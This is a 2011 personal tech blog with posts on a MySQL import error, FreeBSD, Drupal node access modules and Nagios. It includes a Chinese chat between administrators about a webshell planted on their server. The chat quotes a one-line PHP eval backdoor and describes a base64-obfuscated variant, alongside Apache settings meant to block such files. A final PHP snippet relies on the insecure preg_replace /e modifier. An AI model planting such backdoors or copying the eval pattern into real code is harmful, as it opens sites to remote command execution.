Thursday, February 24, 2011

Got error message when trying to import restore mysqldump database file to database

Got error message when trying to import restore mysqldump database file to database

ERROR 1064 (42000) at line 467: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1

As of MySQL 5.0.54, mysql ignores Unicode byte order mark (BOM) characters at the beginning of input files. Previously, it read them and sent them to the server, resulting in a syntax error. Presence of a BOM does not cause mysql to change its default character set. To do that, invoke mysql with an option such as --default-character-set=utf8.

# pkg_info | grep -i mysql
mysql-client-5.5.9 Multithreaded SQL database (client)
mysql-server-5.5.9 Multithreaded SQL database (server)

# mysql --default-character-set=utf8 -u user_name -p db_name < db_dumped.sql

To check if a file contains UTF-8 BOM at header

Tuesday, February 22, 2011

How to Tell know check determine if a FreeBSD system is 64-bit or 32-bit

Method 1:
# uname -m
i386

Method 2:

# file /bin/ls
/bin/ls: ELF 32-bit LSB executable, Intel 80386

Method 3:
# sysctl -a|grep hw.machine
hw.machine = i386

Monday, February 21, 2011

Overview of Node Access modules

Drupal's API contains a pretty good description of how node access works (developers should also analyze the node_access function itself). There are many contributed node access control modules for Drupal and you really should understand the basics of node access before installing and configuring one. The API should suffice for developers but for the benefit of our many community members who build sites without reading code, here is a translation and some basic rules of thumb:

  • In general, you don't want to use more than one node access module on your site. There are many node access modules to choose from: taxonomy access, nodeaccess, simple access, workflow access, etc. We all tend to add lots of modules to our sites and to expect them to play well together, but node access is an area where we need to be extra thoughtful.
  • Users with permission to 'administer nodes' are never restricted by node access modules. Users who do not have permission to 'access content' will never gain access from a node access module. Only users who have 'access content' and not 'administer nodes' are eligible for the wild world of node access module control.
  • If a user's role has permission to create or edit a content type, or to edit their own posts in that content type, that ability will always be allowed regardless of your node access module's configuration. Delete access is included in the 'edit' permission. If you want to control creating, editing, or deleting of your nodes with a node access module, be sure to not give your users these permissions in the permissions table.
  • If your content type comes from an additional module (forum, event, etc.) other than cck, it may have its own permissions to set. Giving a role these permissions will also supersede the use of any node access module.
  • Node access modules always GRANT access and never restrict it. (It is a whitelisting rather a blacklisting system.) If you use two node access modules and one grants access while another does not, access is granted. One exception is the Module Grants module through which it is possible to combine access grants across multiple modules in a more intuitive way. Without it the displayed behaviour may appear backwards from what most people would assume and it's the reason why it is tricky to get involved with multiple node access modules. It is possible to use multiple node access modules in harmony however if for example they are applied to different content types or are giving out different grant types.
  • The four types of possible grants on a node are: view, update, create, and delete. You can use Devel module's devel_node_access to analyze a node's node access grants. (Doing so as a non-developer is a good sign that you've gotten into trouble with your node access modules and may need to follow the above advice!)
  • The node access table in the database can become confused if you have, for example, toyed with multiple node access modules or come into contact with a deranged one. If you have been involved with risky node access behaviors you should rebuild your permissions. You can find this option at admin/content/node-settings which is the 'Post Settings' configuration screen. It is rarely necessary.

Access modules

Security Modules lists some access modules and http://drupal.org/taxonomy/term/69 lists every module with the security tag.

Generic modules

Nodeaccess

Users with the 'grant node permissions' permission will have a grant tab on node pages which allows them to grant access to that node by user or role. Administrators can set default access controls per content type, and also define which roles are available to grant permissions to on the node grants tab.

Access control list modules

The ACL module, short for Access Control List, is an API for other modules to create lists of users and give them access to nodes. It has no UI of its own and will not do anything by itself; install this module only if some other module tells you to.

Content access

This module allows you to manage permissions for content types by role and author. It allows you to specifiy custom view, edit and delete permissions for each content type. Optionally you can enable per content access settings, so you can customize the access for each content node.

Forum access

This module changes your forum administration page to allow you to set forums private. You can control what user roles can view, edit, delete, and post to each forum. You can also give each forum a list of users who have administrative access on that forum (AKA moderators).

Image gallery access

This module changes your image gallery administration page to allow you to set image galleries private. You can control what user roles can view, edit, delete and post to each gallery. You can also give each gallery a list of users who have administrative access on that gallery (AKA moderators).

CCK field based modules

Nodeaccess userreference

Allows you to configure a CCK user reference field so that the user whom is referenced in a node is granted access to view the node. There are also options to give the user access to edit or delete the node.

Nodeaccess Nodereference

Gives access to users if they have access to a referenced node. Checks view, update, and delete grants.

Node access auto reference

Gives automatic access to users if they are referenced somehow to this node.

It's scanning automatically for references with unlimited deep path, so you don't need to worry anymore how to configure your permissions correct, because it's checking for references automatically.

Taxonomy based

Use these modules to control access based on those tags, vocabularies, and terms you already use, if you use them. Classification, taxonomy and tagging modules lists modules to help you classify and tag content.

Taxonomy Access Control

Access control for user roles based on taxonomy categories (vocabulary, terms).

Connect roles to terms. Useful if everyone has the right role. A good way to control a lot of people when they slot easily into a few roles.

Taxonomy Access Control Lite

This module restricts access so that some users may view content that is hidden from others. A simple scheme based on taxonomy, roles and users controls which content is hidden.

Take the Taxonomy Access Control role based access and add user based controls. Lets you assign users to roles and give the roles access to nodes by term but then lets you give special access to those annoying management types who refuse to wait while you create a new role. Also gives you a quick way to let contractors and temps grab quick access to resources. You know the situation. Hey it is seven minutes before your contract runs out. Rearrange the CRM system to include images the same as Facebook. I will give you access to the 398 nodes you have to change. Fix all the spelling mistakes while you are at it.

Taxonomy access user

Taxonomy access with inheritance.

Modules that contain node access modules

Workflow

The workflow module allows the creation and assignment of arbitrary workflows to Drupal node types. Workflows are made up of workflow states. For example, a workflow with the states Draft, Review, and Published could be assigned to the Story node type.

Organic Groups

Enable users to create and manage their own 'groups'. Each group can have subscribers, and maintains a group home page where subscribers communicate amongst themselves.

Domain

The Domain Access project is a suite of modules that provide tools for running a group of affiliated sites from one Drupal installation and a single shared database. The module allows you to share users, content, and configurations across a group of sites such as:

Modules for use by other modules

Relativity access

This module enables access control based on (and so requires) the Node Relativity module. It propagates the grants from a node to its descendants. You should use another module like nodeaccess to provide the grant to the ancestors.

Ubercart node access

UC Node Access lets you attach Node access features to products in your Ubercart store. These features allow customers who purchase the product to receive view access to nodes on your site either indefinitely or for a limited time based on the feature's settings. UC Node Access does not handle access grants itself but rather depends on other modules to define handlers that integrate UC Node Access with the various node access modules developed for Drupal.

User points node access

The Drupal userpoints nodeaccess module enables you to sell access to a single node for a specific category and amount of userpoints.

Ecommerce Node Access Product

Provides 'Node Access' settings for product nodes, whereby users who purchase the product are granted view access to content, which can be predefined either by category, by node, or by view.

Modules that alter the menu to allow access to give edit access

These modules bypass the node access system and instead alter access of node/%/view, node/%/edit and node/%/delete, so may have issues scaling.

Node access

Sunday, February 20, 2011

Why FreeBSD?

Choosing an Operating System


Mac OS X has some clear advantages as a personal workstation,
especially for non computer gurus. It runs MRI tools side-by-side with
commercial publication software such as Adobe, Corel Draw, and MS
Office. The Mac is also by far the easiest system for "normal" people
to manage.

FreeBSD (as well as its
derivatives)
also has some clear advantages over OS X, which may not
be apparent to the average user, so I will discuss some of them below.


One problem the Mac in a networked computer lab, is that some fMRI
applications (e.g. Caret, fslview) are Aqua applications on the Mac,
and hence can't be used effectively from a remote display. Aqua is
Apple's proprietary GUI, which is used for most Mac applications, and
works only on the console.


On FreeBSD, Linux, and other "pure" Unix systems, virtually all
graphical applications use the X11 networked graphics API, which means
they run the same on a remote display as they would on the console
(perhaps somewhat slower due to network bottlenecks, although this
usually isn't a problem.)


In case you were wondering, no, Apple Remote Desktop (ARD) and VNC
won't help with running Aqua applications remotely. There are two reasons:


  1. They take over the console desktop, rather than allow additional
    login sessions on a separate display, as X11 does.
  2. The graphics are terribly slow. ARD and VNC are designed primarily
    as administration tools, and as a way to access your desktop remotely
    on occasion, whereas X11 was designed to handle intensive day-to-day
    graphics work over a (reasonably fast) network.

FreeBSD as a Server and Desktop

FreeBSD, in my experience, has no peer as a server operating system, and makes a pretty good desktop system for most purposes.
The one weak spot I've run into is dealing with multimedia on the WEB. Browser plugins such as RealPlayer and Flash Player need frequent updates, and FreeBSD does not yet have a system in place for installing and updating them easily. For closed-source commercial plugins, FreeBSD must rely on the Linux binaries, and there is sometimes an additional lag between their release for Linux, and their usability on FreeBSD. All in all, though, FreeBSD runs pretty much the same software as Linux. Virtually any open source program that runs on Linux is also available for FreeBSD, and FreeBSD will run most closed source Linux programs as well.

Multitasking

FreeBSD's multitasking is far smoother than in any other OS I've used (and I've used a lot of them). It takes a remarkably heavy load to cause any noticeable degradation in response times. I routinely run computationally intensive programs in the background without suffering any discomfort with my desktop applications such as OpenOffice.org, Firefox, Thunderbird, etc. In most other operating systems, including OS X, desktop applications become choppy and sluggish when other CPU and memory intensive jobs are running. Running background jobs under 'nice' (to lower their CPU priority) can make a huge difference on most other platforms, but it's impossible to get every other user to use it consistently. On FreeBSD, the CPU scheduling is so good that the impact of 'nice' isn't very noticeable, but it's still a good habit to use it.

High Performance Filesystem

FreeBSD uses UFS2, a non-journalling, very fast, very reliable filesystem. Journalling filesystems, in my opinion, are overrated and more of a security blanket than a real benefit. This is not to say that journalling filesystems are "bad"; only that there are other ways to accomplish the same benefits of a journal. I'm thankful that FreeBSD has avoided following the crowd of operating systems adopting journalling filesystems. This demonstrates a commitment to facts and reason above marketing concerns.
For readers unfamiliar with this subject, the journal is a dedicated area of disk used to "buffer" write operations, instead of using RAM for this purpose. This means that write operations are immediately stored on disk, and in the event of a system crash, the journal can be replayed to quickly restore the integrity of the filesystem. Although journals are very effective in restoring filesystem integrity, many people don't realize that they aren't the only solution. The disadvantage of journalling, of course, is that disk is much slower than RAM, and writing data (or meta-data) to the journal and then again to the final location in the filesystem increases the disk head movements necessary to complete a write operation to a file.
UFS2 uses an alternative strategy, known as soft-updates. Soft-updates solve the problems that would make it difficult to repair a filesystem, without sacrificing the performance benefits of memory buffers. There are many articles about the details of soft-updates available on the WEB, so I won't get into details here. For a brief explanation, see the Wikipedia article.
Linux users who have worked with EXT2 often assume that FreeBSD's UFS2 will suffer the same painfully slow filesystem checks, because it doesn't use a journal. However, in the many years since soft-updates were introduced to FreeBSD, I've never seen a filesystem check take more than a few minutes, even on my largest RAID arrays, and I've never suffered a significant loss of data, even in the case of a sudden power outage.
Another common misconception is that journals greatly reduce data loss in the event of a crash. In reality, however, memory-buffers are synchronized to disk about every 30 seconds on a typical Unix system, so at most a fully journalled filesystem will save an additional 30 seconds worth of work. The real benefit and goal of journals is to alleviate the painfully slow (often over an hour long) filesystem checks/repairs that were common to older memory-buffered filesystems, such as EXT2. On that note, I would never advise Linux users to go back to EXT2. Of the filesystems available on Linux, those using journals are clearly the best. My personal recommendation is reiserfs, which in my experience, outperforms EXT3 by a wide margin. Of course, results may vary for a particular application, so if filesystem performance is a major concern, you should do your own benchmarking before you decide.

Ports and Packages

Another important feature of FreeBSD is the ports system, which makes it trivial to download and install (without searching the Internet) virtually all of the popular open source software, and some closed-source programs as well. With the ports/packages system, there is no need to search the WEB for software, and then figure out how to compile it on your system. Currently over 16,000 popular software programs can be found in the ports system, easily searched or browsed on the FreeBSD WEB site, and downloaded and installed with a single command. I've ported many MRI tools to FreeBSD to make them easier for myself and others to install. These ports can be found here.

Stability

I would argue that stability is the most important measure of a system with regard to minimizing computing costs. Talented systems administrators are very hard to come by, and consequently, their time is very expensive. Every system malfunction means time and money down the drain. The more stable your systems are, the more systems can be managed in a given number of admin-hours.
Obviously, system stability also affects the productivity of the users. The major goal in designing a computing system should always be to minimize work interruptions. This means minimizing system outages and malfunctions, and well as minimizing the impact of a system outage. Running FreeBSD will take care of the former. The latter is best served by distributing load as much as possible, rather the centralizing it. E.g., distribute server responsibilities among several systems, so that if one goes down, users will still be able to access the functionality of those that remain.
FreeBSD is by far the most stable operating system I've ever worked with. (And I've worked with a lot of them.) Most of my FreeBSD systems run uninterrupted between hardware failures and power outages. It's common to see FreeBSD machines that have been running well over a year without a reboot, and most outages are due to hardware or power failures.
Moreover, FreeBSD tends to dominate the longest uptime category in Netcraft's WEB surveys.
For current stats:
Most reliable sites
Longest uptimes
FreeBSD has also been the OS of choice by many popular WEB servers, such as yahoo.com, cdrom.com, and hotmail.com. For a history of the OS, see the Wikipedia article.

Support

One of the most common concerns of many would-be FreeBSD users is support. People often assume that since they haven't heard more about the product, it must not be widely used. Not to worry - the FreeBSD community is HUGE, and quite helpful. People often state that Linux is more popular than FreeBSD. While this is almost certainly true, it is not a valid comparison. FreeBSD is a complete system, more akin to a Linux distribution than to Linux in general, and probably has a larger user base than all but the top few Linux distributions. The term "Linux" refers only to the Linux kernel project, around which the many different Linux distributions are built. When it comes to user support, users of the same distribution can be much more helpful than someone just using the same kernel. I.e., RedHat users, despite their best intentions, are somewhat limited in their ability to help you with many questions about your Gentoo or Debian system.
The bottom line is, with FreeBSD, there will be a lot of people using the same complete system as you. Hardware support is very strong, problems are few, and solutions tend to be well publicized. Some companies also offer paid support services for FreeBSD.

FreeBSD and Windows Applications

If you need to run Windows applications as well, I recommend Win4BSD, the latest port of a virtualization system also known as SCO Merge and Win4Lin. Win4BSD is a solid commercial product at a very reasonable price. It's extremely simple to install and use, and runs Windows applications at nearly native speed. If you find this, or any other commercial product useful, please do buy a copy, to encourage future development of commercial applications for FreeBSD and Linux.

Win4BSD 1.1 running Windows XP on a FreeBSD 5.4 desktop

Win4{BSD,Lin} is comparable to Parallels for the Intel Mac, (another solid product) in that it allows you to boot Windows 2000 or XP as a "guest" operating system, which will run at nearly native speed within your FreeBSD host. Setup is a snap, and your virtual Windows system will be ready to use and fully integrated with the host the moment you finish installing Windows. Win4BSD leverages code from the QEMU project, but is much faster and easier to use than the qemu port. It's well worth the modest purchase price.
One advantage of Win4{BSD,Lin} over Parallels on the Mac is that a Windows session can be run from a remote X11 display (e.g. another FreeBSD system, a Linux system, or even a Mac). The GUI may be a bit sluggish over a network, but if the network is 100baseT or more, it's fast enough that it won't delay your work.
Parallels, on the other hand, is an Aqua application, so it can only be run on the Mac console. The GUI is visibly faster than Win4BSD, since Aqua always uses direct hardware rendering vs. X11's client/server model. However, I would consider this more of a cosmetic difference than a functional one. The Win4BSD graphics are fast enough, especially on the console of a modern FreeBSD machine. In theory, you could run Parallels remotely through VNC or Apple Remote Desktop, but performance of these systems is much slower than X11. Windows is unusably slow even over a 100 megabit network with VNC. Another disadvantage of VNC and ARD are that they take over the console rather than allow a separate login session as X11 does. Hence, no one can use the Mac console while you're remotely logged in over VNC or ARD.
If you want to be able to run Windows from a remote display, you'll want to get a FreeBSD or Linux system and run Win4{BSD,Lin}.
Note also that Mac OS X and Parallels are rather memory hungry compared to FreeBSD and Win4BSD, so you'll need to spend more on RAM for your Mac in order to run a Windows guest comfortably. A Mac with 512 megabytes just won't cut it for Parallels, while a FreeBSD box with 512 megabytes does just fine with Win4BSD.





Quick Comparison

Win4BSDParallels Desktop for Mac

Min requirements, Windows XP guest1.4GHz Athlon/Pentium, 512 megabytes RAMIntel Mac, 1 gig RAM

CPU speedNear nativeNear native

GUI responsivenessAdequateGood

Run from a remote displayYesNo

Ease of setupVery easyVery easy

Running Windows applications under a guest operating system
isn't quite as elegant as running OS X
native MS Office, Adobe, etc., but the Win4BSD system integrates very
well with the FreeBSD host.


Other alternatives for emulation and/or virtualization include
VMware, QEMU, and WINE. None of these are as easy to use or efficient
as Win4BSD, however.


WINE also operates quite differently. While the others emulate (or
virtualize) PC hardware, WINE attempts to emulate the Windows API
(applications program interface), allowing Windows programs to run
directly under Unix. This is a much more ambitious task than just
emulating hardware, given that much of the complexity of the Windows
OS must be duplicated. Not to mention that the API is constantly
changing. The advantage is that no Windows OS needs to be purchased
or running in order to run Windows applications. They simply run on
the same Unix desktop as other applications.

Despite the difficulty of the task, the WINE project has made significant progress, and some
major Windows applications can now be run under Linux, FreeBSD, and
other Intel based operating systems.

Reference:
http://www.neuro.mcw.edu/Ports/FreeBSD/why_freebsd.html

Wednesday, February 16, 2011

Nagios 網路監控主機架設

Nagios 網路監控主機架設
http://phorum.study-area.org/index.php?topic=62156.0

Top 100 Network Security Tools
http://sectools.org/index.html

我想改架 icinga 以 Nagios base 的美化版..不過這套在 FreeBSD 必須自己手動裝~ ports tree 裡面沒有
http://www.icinga.org/
==========================================

STAR says:
123

DANNY says:
456

STAR says:
哈~ 你在啦~
不忙了?

DANNY says:
沒那摸忙,呵,在做啥

STAR says:
剛推薦 璉璉用 EditPlus3

DANNY says:
她原本用啥

STAR says:
UltraEdit

DANNY says:
哦! 我前幾天要用 find command 找最近幾天有被修改到的檔案

我用了

# find /www/ -mtime 3

結果不是這樣用!

要找三天內修改過的檔案,要用

find /www/ -mtime -3

( 3 前面多個 - )

而且 這樣還不管用:

# find /www

必需要這樣:

# find /www/

(有 trailing slash)

STAR says:
喔喔@@!

DANNY says:
特此 謹記 & 提醒

-3 // 三天內
+3 // 大於三天
3 // 剛好 "第三天前" 改得 (不是 一天前,不是兩天前)

然後可以加上 seconds, minutes, hours, days, weeks

好比

-3d (三天內,, default 是 day 啦)

STAR says:
正港你 有用什麼軟體做 主機狀態監控嗎?

DANNY says:
目前完全沒有耶 (這是我下一步要進行的了)

STAR says:
Nagios <-- 這個 我這兩天剛好在架

DANNY says:
會緊張是因為上個星期,整個 /www 被塞 後門

STAR says:
http://phorum.study-area.org/index.php?topic=62156.0
喔喔? 被丟 cmd 的後門?

<璉--------------------------------璉> says:
Nagios 這個不是MAX去台中演講的嗎!

STAR says:
YES
21日 台中場講的

DANNY says:
這個月底要先打網站開發完成,然後把主力都放在 主機管理 上

我要來把所有 /www 底下的目錄都設 root (只有 root 才可以改 file,再用 svn update 去定期更新 source codes)

STAR says:
你的後門應該是從 apache 透過 php 的檔案上傳功能被丟上的吧?
然後上傳檔案的那個資料夾又允許執行 執行檔

DANNY says:
不確定,還查不到

目前 好比 /www/upload (上傳目錄)

直接 探訪 http://domain/upload/test.php 是不會被執行耶

STAR says:
小築的主機之也被丟過後門 那隻支檔案是 XXX.php 然後內容只有
<?php eval($_POST[cmd]);?>

DANNY says:
我遇到的那隻,長這樣
http://gala4th.blogspot.com/2010/08/some-drupal-scripts-got-affected-today.html
然後用 base64 encode

eval(base64_decode('DQogIEBz........'))

STAR says:
嗯! 這也有
一樣的

DANNY says:
每天嚴密手動監控中,哈,但長久不是辦法
遇到的那隻 是個算還 滿 完整的 操作控制台 了

STAR says:
PhpSpy 2008
這個吧?
幾乎都是這個

DANNY says:
Top 100 Network Security Tools
http://sectools.org/index.html

(Nagios 也在其中喔)

STAR says:
我是直接從 apache 設定下手

DANNY says:
有寫文件參考嗎?
我是用 drupal 的檔案上傳的目錄有 .htaccess 也有設定

STAR says:
直接把上傳檔案的目錄設定
<Directory "/www/html/updata">
php_admin_flag engine off
Options -ExecCGI
AddType text/plain .html .htm .shtml .php
</Directory>

防止開放上傳目錄 .html.htm .shtml .php可執行
.htaccess 是設定怎樣?

DANNY says:
為何連 .html 也要擋 ?

STAR says:
我連 html htm shtml 全檔
防止你的updata 目錄被丟惡意 html or javascript
就算被丟上來 這些檔案也完全無效

DANNY says:
# cat .htaccess
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006
Options None
Options +FollowSymLinks

STAR says:
你只有設這樣沒用吧?

DANNY says:
drupal 有個專門的 security team 在 觀注 這方面 XD

STAR says:
可執行的檔案依然會跑

DANNY says:
<Directory "/home/www">
### Turn off php
php_admin_flag engine off

Options -ExecCGI

#AddType text/plain .html .htm .shtml .php

#Options Indexes FollowSymLinks

#Options +Indexes FollowSymLinks +ExecCGI
#AllowOverride AuthConfig FileInfo

#
# Controls who can get stuff from this server.
#
Order allow,deny
Allow from all
</Directory>

還沒空去學習這方面,呵

STAR says:
我設這樣下去 /www/html/updata 任何東西都只會變純文字的原始碼show出來
之前被丟後門的時候也是 搞了一個多月才找出問題

DANNY says:
我先做筆記,筆記抄得勤,都往 blog 擺,哈

STAR says:
我甚至也寫定時去掃 web 下的 code 有沒有沒植入
一被植入馬上 MSN 通知~~

DANNY says:
我還不清楚這行

SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006

是做什麼用途的 (猜測可能有其它地方有更詳細的設定)

STAR says:
到最後設成 上傳目錄 無法執行任何 html htm shtm php 才杜絕 被丟後門 or 資料庫被插改東西
照文字看起來只是個 註解提示@@!

DANNY says:
那有把 所有 /www/* 設成

# chown -R root:www

# chmod -R 640

嗎? (我打算這樣搞)

STAR says:
那次還是 由 A站 打 B站的狀況.. 害我在 B站找了老半天找不到異常 code
我 VirtualHost 又各站個別有自己的 log
結果一直找 B 站打得 log 翻不到異常紀錄
但資料庫確實一直被植入 iframe

STAR says:
最後全部同一台機器上所有站的 code 全掃才找到後門在 A站~XD
所以有允許由 web 上傳檔案的目錄 是最危險的

DANNY says:
在 /www 後面要有 trailing slash!!! (如果那個目錄是 symbolic link 的話!!)

# find /www/ -type d -exec chown root:www {} \;
# find /www/ -type f -exec chown root:www {} \;

# find /www/ -type d -exec chmod 760 {} \;
# find /www/ -type f -exec chmod 640 {} \;

STAR says:
你這作法我也搞過@@!
只是讓人沒辦法透過 apache 去改你的code

DANNY says:
這個很 tricky ,如果這樣下指令:

# find /www -type f

會完全找不到東西! 記得要:

# find /www/ -type f

(因為我的 /www 是對應到 /usr/local/www/apache22/data,是 symbolic link 的,務必要有 trailing slash,之前害我除錯除半天)

STAR says:
但無法防止人家丟上來的後門
它的後門還是能跑

DANNY says:
可以啊!用 svn update 搭配的話

STAR says:
這麼麻煩@@?

DANNY says:
在 crontab 跑 svn up
不會呀, 線上主機 的 /www 也是 其中一個 "SVN client"

STAR says:
如我上所說~ 上傳目錄 讓他任何檔案無效化 到目前為止都還沒出事過

DANNY says:
然後 所有開發人員 儘管在他自己 本機 開發

開發完以後 svn commit 上去到 svn server

STAR says:
他有本事丟後門程式上來 就讓它丟了
反正他後門無效
Server 維護就變成要用MIS觀點

DANNY says:
也就是,所有開發人員 和 線上主機 都是 SVN Client

(因為我們有 北美、中國 的時差,所以設置每 5 分鐘 自動檢查一次,但這作法也蠻方便的啦 ,開發完以後就停掉 svn update,因為經常是 網站邊上線 邊新增加功能)

STAR says:
找洞 倒不如讓有洞也沒用

DANNY says:
我兩個都會進行!目錄也要來設置的盡可能絕對嚴格,太討厭了

STAR says:
網站邊上線 邊新增加功能 邊修bug 這很正常啊
有些洞可能不在 code 上面 而是 php or apache 上

DANNY says:
但老是要到主機 svn update 太浪費時間了,而且,只要在 svn control 的 目錄,下指令:

svn st

就可以知道說,有哪些檔案有被 更改到!

原則上,線上主機的 檔案 是不會 從 主機上直接修改的,如果有被修改,那可以立即判定說 有人動了手腳,有漏洞!

(一律只在 開發人員本機 改東西,再 commit)

STAR says:
但你這樣做他要是連你 .svn 下面一起做手腳 svn st 就失效了喔

DANNY says:
我現在是把

/www

跟 上傳目錄是完全分開在不同的路徑底下

"程式碼" 擺在

/usr/local/www/apache22/data (symbolic link /www )

上傳檔 擺在

/usr/local/www/upload_files

這樣一來 /www 就可以完全用 svn control 所有 source code

這樣 svn 指令:

svn status

就有 監控 參考的價值 (當然還要搭配其它的啦)

所以我才想把所有 /www 底下的 都設 root 權限囉,只有 root 可以修改

這樣,即使他透過 www 要做事情,也會因為 權限不足,無法修改檔案

然後把 crontab 裡面的 svn up 是用 root 去跑

我這樣提出我的做法/想法,也是交流一下看看 有沒有 考慮不週全的地方,歡迎挑戰,呵

STAR says:
你後門程式從哪被丟上來才是重點

DANNY says:
歸納一下幾個重點

[] 檔案目錄權限設嚴格,但又不影響 開發 (其它人修改檔案)

[] 讓上傳的檔案完全失效

[] 監控修改的檔案,包含修改日期和修改內容有無 骯髒的 code,有問題立即 mail

[] 補充?

STAR says:
權限鎖死 當然它不能改你已存在的檔案
但如果他還是能新增檔案 那可能就是問題了

DANNY says:
有機會是 程式碼 本身有問題 (不一定是上傳那),也或許是可以直接下系統指令新建 執行檔

所以最好連 "目錄" 權限一併 鎖死

STAR says:
有些知道你已經把檔案權限鎖死 但你還是可以讓他放惡意程式
這時候他會把你的站當惡意程式散播的跳板
而不是直接去打你的站

DANNY says:
連新的 file 都不能增加,再妥善 安排 設置 "需要被更動的目錄" (好比上傳 或 一些 動態的 圖檔 等資料 要定期 更新的)

STAR says:
你的 Doman Name 如果被檢測到有散播惡意程式的話會被 Google 這種 大咖列為 危險警告 網站

DANNY says:
對,我有遇過!塞了好幾個 html 檔,裡面是轉址到某網站
所以只能盡可能 全方面都擋,可能性太多 :P

STAR says:
所以上面我才連 html htm shtm 都設為不可執行@@
不過我現在想到 還漏了 .js 跟 .css

DANNY says:
嗯,我覺得我們這樣交流很好耶!很過癮,呵
<璉--------------------------------璉> says:
各位晚安了~

STAR says:
璉璉 晚安~~
快去睡吧~

DANNY says:
腦袋激盪一下

STAR says:
現在 .js 跟 .css 也可能被植入惡意程式

DANNY says:
我現有習慣 完全不直接到 主機上 修改任何程式碼,一律秀過 svn 改

STAR says:
喔@@!
還有更厲害的是 把圖檔植入惡意程式碼..
這要靠 apache 的一些防惡意圖檔的 模組過濾了!

STAR says:
今天 OSDC 有日本的講者 live demo 圖檔植入惡意code

STAR says:
那場很 high 幾乎所有程式語言都可以執行

DANNY (tu) 正港.沉 - 忍者無敵 says:


STAR says:
圖片中植入惡意code

G到的PDF文件

打造安全的Web Server Base on Apache+PHP+MySQL)
http://210.240.6.7/v7/edudata/file_down/497/20090818-130229__WebServer.pdf

STAR says:
這 PDF 裡面說到的 mod_security2 我有裝!

STAR says:
http://osdc.tw/2010/02/schedule_polyglot_programming.html

STAR says:
有人做的筆記 講到 mod_imagefight 防止圖片插入的攻擊法
http://infuture.pixnet.net/blog/post/25250802

STAR says:
這好像就是那位日本講者的簡報
http://wafful.org/mod_imagefight/ImageFight-LL2007.ppt

Polyglot Programming 算是比較高級的技術了!! 要是碰到這種可能也很難防

你怎麼會知道 圖檔裡有被插入惡意code!

replace img tag src relative path to absolute path while leaving original absolute path remains the same.

replace img tag src relative path to absolute path while leaving original absolute path remains the same.

<pre class="php" name="code"><?php
$STR = <<<EOD
<html>
<body>
<img src='/sites/default/files/my_web/1.gif' width='6' height='6'>
<img src='/sites/default/files/my_web/2.gif' width='6' height='6'>
<img src='sites/default/files/my_web/3.gif' width='6' height='6'>
<img src='sites/default/files/my_web/4.gif' width='6' height='6'>
<img width='6' height='6' src='/sites/default/files/my_web/5.gif'>
<img width='6' height='6' src='sites/default/files/my_web/6.gif'>
<br>
<img src="/sites/default/files/my_web/7.gif" width="6" height="6">
<img src="/sites/default/files/my_web/8.gif" width="6" height="6">
<img src="sites/default/files/my_web/9.gif" width="6" height="6">
<img src="sites/default/files/my_web/10.gif" width="6" height="6">
<img width="6" height="6" src="/sites/default/files/my_web/11.gif">
<img width="6" height="6" src="sites/default/files/my_web/12.gif">

<img src="http://google.com/sites/default/files/my_web/13.gif" width="6" height="6">

<a href="www.google.com">test</a>
<a href="http://www.google.com">test</a>

</body>
</html>
EOD;

$base_url = 'http://hmm.com/';

echo _replace_img_src_rel2abs($STR, $base_url) . PHP_EOL;

/**
* replace img tag src relative path to absolute path while leaving original absolute path remains the same.
* @param
* @return
*/
function _replace_img_src_rel2abs($STR, $base_url = 'http://gan.com') {
$base_url = rtrim($base_url, '/') . '/';

$matchArr = array();

$pattern = '/src=["\']([^"\':]+)["\']/ie';
// Note: If e modifier is set, preg_replace() does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string. Single quotes, double quotes, backslashes (\) and NULL chars will be escaped by backslashes in substituted backreferences.

return preg_replace($pattern, '_replace_img_src_rel2abs_add_base_url("$1", \$base_url);', $STR);
}

function _replace_img_src_rel2abs_add_base_url($STR = '', $base_url = '') {
return 'src="' . $base_url . ltrim($STR, '/') . '"';
}
?></pre>